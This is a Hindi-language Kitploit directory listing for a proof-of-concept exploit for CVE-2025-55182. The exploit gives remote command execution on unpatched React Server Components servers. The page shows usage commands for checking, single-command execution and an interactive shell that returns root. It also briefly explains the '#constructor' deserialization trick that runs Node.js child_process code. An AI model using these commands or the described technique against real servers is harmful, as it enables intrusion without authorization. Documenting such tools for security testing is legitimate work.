Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

CVE-2025-55182 के लिए Poc

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182-PoC

CVE-2025-55182 के लिए प्रमाण-अवधारणा

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। बिना पूर्व आपसी सहमति के लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। डेवलपर कोई दायित्व नहीं लेता है और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

आवश्यकताएँ

pip install requests

उपयोग

आप उपकरण को तीन मोड में चला सकते हैं: जाँच, शोषण, या इंटरएक्टिव शेल।

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

उदाहरण

root@kitploit:~
python3 poc.py -u http://target-site.com --check

एकल कमांड निष्पादन

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

इंटरएक्टिव शेल मोड

root@kitploit:~
python3 poc.py

# शेल के अंदर
RSC-Shell> set url http://localhost:3000
[+] URL सेट किया गया: http://localhost:3000
RSC-Shell> check
[+] लक्ष्य असुरक्षित है!
RSC-Shell> shell
[*] स्यूडो-इंटरएक्टिव शेल शुरू हो रहा है। वापस जाने के लिए 'exit' का उपयोग करें।
cmd> whoami
root

यह कैसे काम करता है

जाँच: इंडेक्स 1 पर {} को परिभाषित करते हुए एक मल्टीपार्ट अनुरोध भेजता है, और ["$1🅰️a"] तक पहुँचने का प्रयास करता है। अपैच्ड सर्वर undefined के गुण a तक पहुँचने का प्रयास करते समय क्रैश (HTTP 500) करते हैं। पैच किए गए सर्वर HTTP 200 लौटाते हैं।

शोषण: मान्य क्रिया आईडी का संदर्भ देते हुए एक मल्टीपार्ट अनुरोध भेजता है, लेकिन #constructor जोड़ता है। यह सीरियलाइज़र को फंक्शन कंस्ट्रक्टर लौटाने के लिए धोखा देता है, जिससे हम सर्वर पर निष्पादित होने के लिए मनमाना जावास्क्रिप्ट (Node.js child_process) पास कर सकते हैं।

टूल डाउनलोड करें